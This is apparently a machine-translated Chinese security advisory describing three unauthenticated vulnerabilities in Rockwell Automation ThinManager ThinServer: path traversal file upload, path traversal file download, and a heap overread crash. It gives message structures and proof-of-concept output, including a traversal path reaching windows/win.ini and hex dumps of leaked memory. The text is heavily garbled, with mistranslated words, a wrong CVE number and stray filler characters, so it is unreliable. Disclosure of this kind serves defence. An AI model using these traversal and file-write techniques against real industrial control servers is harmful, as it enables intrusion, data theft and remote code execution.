Rockwell自动化 ThinManager ThinServer多重易变性

Rockwell自动化ThinManager ThinServer.exe中存在多重漏洞

受影响版本 :

• 6.x-10.x
• 11.0-11.0
• 11.1.0-11.1.5
• 11.0-11.2.6
• 12.0-12.0
• 12.1.0-12.1.5
• 13.0-13.0.1

CVE2023-27855-薄管理服务器路径轨迹上传

(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

客户端消息发送到ThinServer.exe同步线程

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++/msg类型bis/msg旗/0x0001-请求/0x0002-响应/0x800-贝32连/Msg体长structmsg{headerhdr字节数据//格式取决于hdr.类型}structmsg_7_35/hdr类型必须是7或35b32unk字符串文件名//取消字符串文件类型字符串unk字符串unk/sg35blen//bitte数

路径遍历处理7或35型消息时存在(通过文件_name字段处理)(SYNC_MSG_SEND_FILE)。非认证远程攻击者可利用它向磁盘驱动器中安装 ThinServer.exe的任何目录上传任意文件攻击者可用攻击者控制恶意内容覆盖现有可执行文件,可能导致远程代码执行

POC:

概念利用漏洞证明由Tenable研究生成下例输出POC对脆弱目标执行

示例输出

server_path_traversal_file上载
              
               f/tmp/malious_file_contents-n00000: 0040000008002893546B3F/tmp/malious_file_contents上传远程主机请检查文件上传
              

CVE2023-2785-ThinManager ThinServer路径轨迹下载

(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

客户发送消息8结构如下:

struct msg_8/hdr类型必须是8b32unk字符串文件名//失效字符串};

路径遍历处理类型8消息非认证远程攻击者可利用它下载磁盘驱动器上任意文件,并安装 ThinServer.exe

POC:

概念利用漏洞证明由Tenable研究生成下例输出POC对脆弱目标执行

示例输出

ython3薄服务器_path_traversal_file_dload.
              
               windows/win.ini00000: 00400000000050682FA1BF3Fen00000000000500010:2E5C2E2E2E2E2E2E2E2E2E2E2E500020:5C2E2E5C57696E646F77735C\.s(可达4096字节)-0000000000000000005C.d.16位app00020:2073 75706F72740D0A5B666F6E7473支持0A5B6D63692065746E73.[mci扩展0D0A5B66696C65735D0D0A5D6169].
              

CVE-2023-27857-丁管理器高速缓冲溢出

(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

堆积缓冲条件发生时msg_7_35.fle非认证远程攻击者可利用此漏洞:

• 创建大数tmp文件C:\ programData\Rockwell软件\ ThinManager\tm
• 将数据字段后内存内容写入tmp文件,通过利用漏洞下载2
• Crash ThinServer.exe因阅读违规

POC:

概念利用漏洞证明由Tenable研究生成下例输出POC对脆弱目标执行

示例输出

ython3薄服务器sendfile
              
               连接2连接3连接4追踪(最近最后一次调用):文件 "/Work/0day/thinserver_sendfile_dos.py.
               
                s.connect((目标,端口))ConnectRefedError:[Errno111]Connect拒绝
               
              

重开丁Server.exe

ython3薄服务器_path_traversal_file_dload.
              
               serqdata/Rockwell软件ThinManager/tm/tpstallfile000000: 00400008000B84F6623Fen0000: 00080000005F 000A2E2E5C2E500010:2E5C2E2E2E2E2E2E2E2E2E2E2E00000020: 5C 2E 2E 5C 2E 2E 5C 5C  50 72 6F 67 72 61 6D 44  \..\..\\ProgramD 00000030: 61 74 61 5C 52 6F 63 6B  77 65 6C 6C 20 53 6F 66  ata\Rockwell Sof 00000040: 74 77 61 72 65 5C 54 68  69 6E 4D 61 6E 61 67 65  tware\ThinManage 00000050: 72 5C 74 6D 70 5C 74 6D  70 69 6E 73 74 61 6C 6C  r\tmp\tmpinstall 00000060: 66 69 6C 65 5F 30 00                              file_0.men00: 000000000000000004141414141414141AAAAAAAAAAAAAAAAAAAAAAA000207F00108FA20200001000000000000000000000000000000FC3080F00805C003F05C043000000000000000000000000000000000000000000000000000000000000000000000000.S.O.R.000C0:05005C546800690000000000640622D00720000086C3020FF9F090000000.snip.